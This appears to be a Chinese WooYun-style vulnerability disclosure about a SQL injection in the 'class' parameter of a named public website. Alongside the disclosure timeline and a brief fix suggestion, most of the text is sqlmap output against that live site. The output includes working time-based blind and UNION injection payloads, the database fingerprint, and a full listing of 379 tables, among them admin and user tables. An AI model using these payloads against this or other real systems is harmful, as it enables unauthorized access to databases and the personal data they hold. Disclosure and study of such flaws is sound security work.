2016-02-26: 细节已通知厂商并且等待厂商处理中
2016-03-02: 厂商已经主动忽略漏洞,细节向公众公开
http://www.roowei.com/js/Album.js.php?action=Select_album&class=0&diqu=0&limit=7
据下文 sqlmap 输出,存在注入的是 GET 参数 class:该参数未经校验即进入 SQL 语句;修复时应对其做整型校验并改用参数化查询。
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: class (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: action=Select_album&class=0) AND (SELECT * FROM (SELECT(SLEEP(5)))SVlA) AND (9229=9229&diqu=0&limit=7

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: action=Select_album&class=0) UNION ALL SELECT NULL,CONCAT(0x716b767a71,0x45666263565575454c75,0x7178716271),NULL,NULL,NULL-- &diqu=0&limit=7
---
web application technology: PHP 5.5.14
back-end DBMS: MySQL >= 5.0.0
Database: roowei
[379 tables]
+---------------------------------+
| sl_admin || sl_admin_ads || sl_admin_ads_manage || sl_admin_ads_new || sl_admin_ads_page || sl_admin_ads_type_manage || sl_admin_article || sl_admin_articlehits || sl_admin_articlemycat || sl_admin_articlepage || sl_admin_industry_ads || sl_admin_industry_webseo || sl_admin_web_page || sl_adminfailedlogin || sl_admingroup || sl_admingroupmap || sl_adminoperlog || sl_adminsection || sl_album_user || sl_backsession || sl_cacheback || sl_cachefront || sl_cachesearchback || sl_cachesearchfront || sl_ci_sessions || sl_cn_ads || sl_cn_ads1 || sl_cn_ads_industry || sl_cn_ads_new || sl_cn_advertising || sl_cn_advertising2 || sl_cn_advertising_industry || sl_cn_advertising_new || sl_cn_album || sl_cn_article || sl_cn_article1 || sl_cn_article1_content || sl_cn_article1_count || sl_cn_article_index || sl_cn_article_index_category || sl_cn_article_index_content || sl_cn_article_index_count || sl_cn_articlecatadgrmap || sl_cn_articlecategory || sl_cn_articlecatusgrmap || sl_cn_articlecomment || sl_cn_articlecontribution || sl_cn_articlecounter || sl_cn_articlehits || sl_cn_articleimg || sl_cn_articleimg_copy || sl_cn_articlemycat || sl_cn_articlemycomment || sl_cn_articlepage || sl_cn_articlepage1 || sl_cn_classinfo || sl_cn_classinfo1 || sl_cn_classinfo_adminpush || sl_cn_classinfo_attr || sl_cn_classinfo_attr_value || sl_cn_classinfo_category || 
sl_cn_classinfo_comment1 || sl_cn_classinfo_content || sl_cn_classinfo_count || sl_cn_classinfo_favorite || sl_cn_classinfo_jobmap || sl_cn_classinfo_list || sl_cn_classinfo_old_data || sl_cn_classinfo_order || sl_cn_classinfo_template || sl_cn_classinfo_xphoto || sl_cn_classinfoattr || sl_cn_classinfocatadgmap || sl_cn_classinfocatattrelement || sl_cn_classinfocatgeory || sl_cn_classinfocatusgmap || sl_cn_classinfomember || sl_cn_comment || sl_cn_count || sl_cn_custom_navigate || sl_cn_domain || sl_cn_feedback || sl_cn_feedbacktadgmap || sl_cn_feedbacktusgmap || sl_cn_feedbacktype || sl_cn_friendly_link || sl_cn_gallery_album || sl_cn_gallery_picture || sl_cn_goods || sl_cn_goodscatadgrmap || sl_cn_goodscategory || sl_cn_goodscatusgrmap || sl_cn_goodscomment || sl_cn_goodsconsignee || sl_cn_goodscounter || sl_cn_goodsmycomment || sl_cn_goodsorder || sl_cn_goodsordergoods || sl_cn_hweb_hist || sl_cn_indexs || sl_cn_indexs_1 || sl_cn_indexs_copy1 || sl_cn_industrie_manage || sl_cn_industrie_nav || sl_cn_industry_admin || sl_cn_industry_ads_seat || sl_cn_industry_ads_trade || sl_cn_industry_advertise || sl_cn_industry_album || sl_cn_industry_company || sl_cn_industry_company_mycat || sl_cn_industry_picture || sl_cn_industry_recharge_record || sl_cn_industry_website || sl_cn_infor_rule || sl_cn_menu || sl_cn_message || sl_cn_module || sl_cn_module_choose || sl_cn_module_choose_custom_text || sl_cn_module_manage || sl_cn_navigate || sl_cn_navigate_mark || sl_cn_payment || sl_cn_photo || sl_cn_poll || sl_cn_polloption || sl_cn_product || sl_cn_product_content || sl_cn_product_count || sl_cn_product_index || sl_cn_product_index_category || sl_cn_product_index_content || sl_cn_product_index_count || sl_cn_quick || sl_cn_router_auth_logs || sl_cn_router_auth_page || sl_cn_router_info || sl_cn_router_user || sl_cn_site || sl_cn_sms_order || sl_cn_staticcontent || sl_cn_template || sl_cn_territory || sl_cn_tools || sl_cn_tools_count || sl_cn_tradebuyvip || 
sl_cn_tradecertificate || sl_cn_tradecompany || sl_cn_tradecompanyseo || sl_cn_tradecorpindmap || sl_cn_tradedomainname || sl_cn_tradefavoritejobad || sl_cn_tradefavoritejobseeker || sl_cn_tradeindadgmap || sl_cn_tradeindattrelement || sl_cn_tradeindusgmap || sl_cn_tradeindustry || sl_cn_tradeindustry_data || sl_cn_tradeinfo || sl_cn_tradeinfo2 || sl_cn_tradeinfo_content || sl_cn_tradeinfoattr || sl_cn_tradeinfotype || sl_cn_tradejobads || sl_cn_tradejobcategory || sl_cn_tradejobmap || sl_cn_tradejobseeker || sl_cn_tradelink || sl_cn_trademessage || sl_cn_trademyproduct || sl_cn_trademyproductcat || sl_cn_tradeprocontri || sl_cn_tradeproduct || sl_cn_tradeproduct_content || sl_cn_tradeproductattr || sl_cn_tradeproducthist || sl_cn_user_ads || sl_cn_user_hits || sl_cn_user_manageads || sl_cn_user_orderads || sl_cn_user_quick || sl_cn_usertools || sl_cn_video || sl_cn_videoblog || sl_cn_videocatadgrmap || sl_cn_videocategory || sl_cn_videocatusgrmap || sl_cn_videocomment || sl_cn_videocontribution || sl_cn_videocounter || sl_cn_videomycat || sl_cn_videomycomment || sl_cn_videopage || sl_cn_web || sl_cn_web_copy || sl_cn_web_hist || sl_cn_web_industry || sl_cn_webpage || sl_cn_webpageblock || sl_cn_webpagetype || sl_cn_webseo || sl_cn_weisite_adv || sl_cn_weisite_adv_content || sl_cn_weisite_adv_count_201503 || sl_cn_weisite_adv_count_201504 || sl_cn_weisite_adv_count_201507 || sl_cn_weisite_adv_count_201602 || sl_cn_weisite_adv_count_main || sl_cn_weisite_article || sl_cn_weisite_article_content || sl_cn_weisite_consum_level || sl_cn_weisite_custom_category || sl_cn_weisite_custom_column || sl_cn_weisite_custom_view || sl_cn_weisite_industry_class || sl_cn_weisite_info || sl_cn_weisite_tpl || sl_cn_wifi_auth_count || sl_cn_wifi_auth_count_201503 || sl_cn_wifi_auth_count_201504 || sl_cn_wifi_auth_count_main || sl_cn_wifi_auth_page || sl_cn_wifi_router_auth_logs || sl_cn_wifi_router_info || sl_cn_wifi_router_user || sl_cn_wifi_sms_log || sl_cn_wifi_sms_tpl || 
sl_cn_wifi_template || sl_cn_wifi_value_add || sl_cn_xfphoto || sl_content_page || sl_cron || sl_cuxiao || sl_defaulttemp || sl_du_bborder || sl_du_bcrelation || sl_du_border || sl_du_content || sl_du_content_1 || sl_du_layout || sl_du_module || sl_du_proportion || sl_emotion || sl_frontsession || sl_goods_ads || sl_goods_adsadmin || sl_goods_advertising || sl_goods_album || sl_goods_album_pic || sl_goods_album_pic_count || sl_goods_article || sl_goods_attribute || sl_goods_attribute_rule || sl_goods_attribute_value || sl_goods_brand || sl_goods_brand_class || sl_goods_category || sl_goods_category_class || sl_goods_category_staple || sl_goods_collection || sl_goods_custom_category || sl_goods_default_logistics || sl_goods_delivery_address || sl_goods_feedback || sl_goods_link || sl_goods_logistics || sl_goods_map || sl_goods_member_level || sl_goods_money_back || sl_goods_navadmin || sl_goods_order || sl_goods_order_pro || sl_goods_payment || sl_goods_product || sl_goods_product_attr || sl_goods_product_close || sl_goods_product_content || sl_goods_product_count || sl_goods_product_pic || sl_goods_product_spec || sl_goods_product_storage || sl_goods_ship || sl_goods_ship_address || sl_goods_shop_cart || sl_goods_spec || sl_goods_spec_value || sl_goods_store || sl_goods_storeinfo || sl_goods_stroenav || sl_goods_template_admin || sl_goods_tpladmin || sl_goods_type || sl_goods_type_brand || sl_goods_type_spec || sl_goods_uidtourl || sl_goods_video_list || sl_goods_weiquan || sl_inadmin_cuxiao || sl_industry_dress_template || sl_industry_module || sl_industry_template || sl_industry_video_list || sl_instance || sl_keyword || sl_manage_admin_details || sl_manage_admins || sl_manage_auth || sl_manage_auth_module || sl_manage_auth_rights || sl_manage_controllers || sl_manage_cpage || sl_member_dress_template || sl_member_industry || sl_member_layout || sl_member_module || sl_member_module_style || sl_member_template || sl_mess || sl_na_ads_admin || sl_na_ads_trade || 
sl_na_advertising || sl_na_advertising_price || sl_na_advertising_type || sl_na_member || sl_na_member_field || sl_na_role || sl_na_store_grade || sl_na_storegrade_order || sl_newscontent || sl_oauth || sl_operator || sl_operator_field || sl_operators_order || sl_page || sl_qq || sl_role || sl_role_module || sl_role_project || sl_setting || sl_site_type || sl_tml || sl_trade_ads || sl_user || sl_user_autologin || sl_user_code || sl_user_config || sl_user_error || sl_user_forgetpassword || sl_user_grade || sl_user_oem || sl_user_oemlist || sl_user_publish_count || sl_user_templates || sl_user_upgrade || sl_userextra || sl_usergroup || sl_usergroupmap || sl_usersection || sl_video || sl_video_list || sl_web_class || sl_web_r_page || sl_web_shenghuo || sl_webp_class || sl_website_setting || sl_weicode || sl_wx_autoreply || sl_wx_menu || sl_wx_owneruser || sl_wx_thesaurus || sl_wx_user || sl_yy_admin || sl_yy_module || sl_yy_modulegroup || sl_yy_role || sl_yy_usermodule || sl_yy_userrole || users |+---------------------------------+
危害等级:无影响(厂商忽略)
忽略时间:2016-03-02 12:20
漏洞Rank:4 (WooYun评价)
暂无